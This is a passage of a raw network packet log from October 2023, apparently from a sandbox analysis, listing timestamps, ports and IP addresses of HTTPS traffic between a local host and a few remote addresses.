Oct 13, 2023 15:21:13.286700010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.286715031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.286772013 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.286788940 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.286832094 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.287651062 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.287664890 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.287722111 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.287735939 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.287782907 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.289026022 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.289052963 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.289092064 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.289099932 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.289129972 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.289153099 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.290317059 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.290332079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.290386915 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.290394068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.290460110 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.291444063 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.291455984 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.291513920 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.291522026 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.291560888 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.293406963 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.293421984 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.293484926 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.293492079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.293534040 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.295298100 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.295311928 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.295372963 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.295380116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.295418024 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.297553062 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.297564983 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.297624111 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.297631025 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.297666073 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.299559116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.299571991 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.299654007 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.299684048 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.299726009 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.301477909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.301502943 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.301558018 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.301568985 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.301595926 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.301616907 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.303528070 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.303543091 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.303608894 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.303622007 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.303668022 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.305588961 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.305607080 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.305666924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.305679083 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.305728912 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.307526112 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.307538986 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.307602882 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.307615042 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.307660103 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.308135033 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:13.308336973 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:13.309531927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.309545994 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.309633970 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.309645891 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.309694052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.310451984 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.311491966 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.311506033 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.311552048 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.311564922 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.311592102 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.312474966 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.313740015 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.313754082 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.313824892 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.313837051 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.313884974 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.315720081 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.315733910 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.315831900 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.315848112 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.315897942 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.317579031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.317593098 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.317665100 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.317677975 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.317738056 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.319570065 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.319583893 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.319629908 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.319647074 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.319674015 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.322005033 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.322025061 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.322077036 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.322097063 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.322120905 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.322732925 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.323745966 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.323760986 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.323844910 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.323858976 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.323906898 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.325716019 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.325736046 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.325793982 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.325807095 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.325855017 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.327986002 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.328000069 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.328083038 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.328103065 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.328151941 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.329401970 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.329416037 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.329483032 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.329513073 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.329564095 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.331916094 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.331938982 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.332009077 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.332024097 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.332076073 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.334007025 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.334018946 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.334088087 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.334101915 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.334147930 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.335592985 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.335604906 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.335669041 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.335680962 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.335728884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.337712049 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.337724924 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.337789059 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.337801933 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.337851048 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.339981079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.339993954 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.340063095 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.340075016 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.340250969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.342338085 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.342350960 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.342417955 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.342430115 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.342479944 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.343492031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.343504906 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.343566895 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.343579054 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.343642950 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.345997095 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.346010923 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.346066952 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.346080065 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.346132040 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.348128080 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.348140955 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.348208904 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.348221064 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.348273039 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.349984884 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.349997997 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.350060940 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.350074053 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.350127935 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.351846933 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.351861000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.351926088 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.351938963 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.351989985 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.353996038 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.354008913 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.354084015 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.354098082 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.354146957 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.355971098 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.355986118 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.356048107 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.356060982 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.356107950 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.358392000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.358405113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.358463049 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.358475924 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.358530045 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.359952927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.359966040 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.360033989 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.360047102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.360095024 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.362088919 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.362109900 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.362159967 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.362173080 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.362198114 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.362219095 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.364228010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.364243984 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.364321947 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.364336014 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.364384890 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.366024971 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.366039991 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.366106987 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.366121054 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.366169930 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.367994070 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.368007898 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.368078947 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.368092060 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.368140936 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.370527029 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.370541096 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.370618105 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.370630980 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.370685101 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.372068882 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.372082949 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.372153044 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.372160912 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.372199059 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.373995066 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.374008894 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.374063015 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.374072075 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.374109983 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.375202894 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.375217915 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.375267029 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.375273943 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.375309944 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.377228975 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.377243042 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.377290010 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.377296925 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.377331018 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.379240036 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.379255056 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.379316092 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.379323959 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.379363060 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.381015062 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.381030083 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.381084919 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.381093025 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.381145954 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.382553101 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.382567883 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.382621050 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.382627010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.382656097 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.382675886 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.384432077 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.384448051 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.384502888 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.384510040 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.384548903 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.386020899 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.386039019 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.386096001 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.386101961 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.386136055 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.387866020 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.387881041 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.387933016 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.387938976 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.387976885 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.389267921 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.389286995 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.389343977 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.389357090 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.389394999 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.391293049 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.391307116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.391360044 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.391367912 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.391403913 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.392975092 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.392988920 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.393042088 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.393054008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.393105984 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.394685030 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.394697905 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.394747019 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.394759893 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.394808054 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.396073103 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.396091938 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.396142006 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.396153927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.396200895 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.397809982 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.397823095 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.397876978 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.397890091 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.397936106 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.399684906 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.399698973 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.399755001 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.399766922 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.399796009 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.400068998 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.401227951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.401241064 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.401295900 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.401309013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.401354074 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.402662992 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.402676105 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.402739048 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.402750969 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.402798891 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.404037952 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.404051065 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.404109001 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.404122114 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.404165983 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.405440092 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.405452013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.405512094 CEST	49739	443	192.168.2.5	172.67.213.185
